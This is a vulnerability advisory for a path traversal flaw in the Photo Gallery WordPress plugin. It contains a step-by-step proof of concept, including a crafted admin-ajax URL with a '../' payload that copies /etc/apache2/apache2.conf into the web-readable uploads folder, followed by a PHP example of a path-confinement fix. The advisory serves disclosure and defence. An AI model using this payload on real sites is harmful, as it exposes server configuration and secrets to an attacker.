Path traversal vulnerability in Gallery may allow admins to read most files on the filesystem

CVSS base score: 5.5 (Medium)

  Access vector:      Network
  Access complexity:  Low
  Authentication:     Single
  Confidentiality:    Partial
  Integrity:          Partial
  Availability:       None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Vulnerability

The plugin contains a file manager component which allows broad access to the filesystem, including deleting, uploading, and moving files. Its rename_item task does not confine the file_names parameter to the plugin's upload directory, so a path containing "../" sequences can reach files elsewhere on the server. In this proof-of-concept we use that traversal to copy an Apache configuration file into a web-readable directory, from where the attacker can read any secrets it contains.

Proof of concept

  1. Visit: http://localhost/wp-admin/admin.php?page=galleries_bwg
  2. Click “Add New”
  3. Open the browser’s dev tools
  4. Click “Add Images”
  5. Find the request to a URL starting with “/wp-admin/admin-ajax.php?action=addImages&”
  6. Look for the bwg_nonce parameter in the URL and make a note of the value
  7. Visit this URL, making sure to replace NONCE_VALUE with the nonce you found: http://localhost/wp-admin/admin-ajax.php?action=addImages&bwg_nonce=NONCE_VALUE&callback=bwg_add_image&task=rename_item&file_names=../../../../../../etc/apache2/apache2.conf&file_new_name=apacheconfigfile
  8. To access the file, visit: http://localhost/wp-content/uploads/photo-gallery/apacheconfigfile.conf

Note that the number of "../" sequences needed depends on where the plugin's upload directory sits in the server's directory layout, that /etc/apache2/apache2.conf does not exist (or is not readable by the web server user) in all configurations, and that some servers are configured to block requests for .conf files under wp-content/uploads.

If the web server user has write access to /etc, the rename would move the file and could break Apache. In most configurations it does not, so PHP's rename() cannot remove the source and the file is merely copied into the upload directory. This copy-and-leave behaviour relies on PHP's fallback for source and destination on different filesystems; when both sit on the same filesystem, the underlying rename(2) call fails outright if the source directory is not writable, and no copy is made.
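The check that prevents this class of bug is to canonicalise the user-supplied path and refuse anything that resolves outside the plugin's upload directory, and to accept only a bare filename for the new name. The following is an added example written for this advisory, not Photo Gallery's own code; the function names, the image-extension allowlist, and the sandbox directory are assumptions, with $base_dir standing in for wp-content/uploads/photo-gallery.

```php
<?php
// Added example (not Photo Gallery's own code): confining a file-manager
// rename operation to the plugin's upload directory. Function names are
// hypothetical; $base_dir stands for wp-content/uploads/photo-gallery.

/**
 * Resolve $user_path relative to $base_dir and return the canonical path,
 * or null if it escapes the base directory or does not exist.
 */
function resolve_inside(string $base_dir, string $user_path): ?string
{
    // Null bytes truncate paths in some libc calls; refuse them outright.
    if (strpos($user_path, "\0") !== false) {
        return null;
    }
    $base = realpath($base_dir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses every "../" and follows symlinks, so a payload such as
    // "../../../../../../etc/apache2/apache2.conf" resolves to its real location.
    $real = realpath($base . DIRECTORY_SEPARATOR . $user_path);
    if ($real === false) {
        return null;
    }
    // Accept only the base directory itself or something strictly beneath it.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($real !== $base && strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

/**
 * Rename a file inside $base_dir. Returns true on success, false if either
 * name is rejected or the underlying rename() fails.
 */
function safe_rename_item(string $base_dir, string $file_name, string $new_name): bool
{
    $src = resolve_inside($base_dir, $file_name);
    if ($src === null || !is_file($src)) {
        return false;
    }
    // The new name must be a bare filename: no separators, no "..", no NUL.
    if ($new_name === '' || $new_name === '.' || $new_name === '..'
        || strpos($new_name, "\0") !== false
        || strpbrk($new_name, '/\\') !== false) {
        return false;
    }
    // Assumption: a gallery only ever serves images, so refuse other extensions.
    $allowed = ['jpg', 'jpeg', 'png', 'gif', 'webp'];
    $ext = strtolower(pathinfo($new_name, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed, true)) {
        return false;
    }
    // Destination stays in the source's directory, which is inside $base_dir.
    $dst = dirname($src) . DIRECTORY_SEPARATOR . $new_name;
    if (file_exists($dst)) {
        return false;
    }
    return rename($src, $dst);
}

// Constructed demo in a throw-away directory, not a real WordPress install.
$sandbox = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'bwg-demo-' . bin2hex(random_bytes(4));
mkdir($sandbox, 0700, true);
file_put_contents($sandbox . DIRECTORY_SEPARATOR . 'photo.jpg', 'constructed image bytes');

// The advisory's payload is refused before any filesystem change happens.
var_dump(safe_rename_item($sandbox, '../../../../../../etc/apache2/apache2.conf', 'apacheconfigfile'));
// A rename that stays inside the directory is still allowed.
var_dump(safe_rename_item($sandbox, 'photo.jpg', 'renamed.jpg'));

// Tidy up the sandbox.
array_map('unlink', glob($sandbox . DIRECTORY_SEPARATOR . '*'));
rmdir($sandbox);
```

Because realpath() follows symlinks, a link planted inside the upload directory that points at /etc is also rejected, which is the desired outcome for a gallery. The prefix comparison must include the trailing separator; comparing against the bare base path would accept a sibling directory such as photo-gallery-old.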

Mitigation/further actions

Upgrade to version 1.3.34 or later.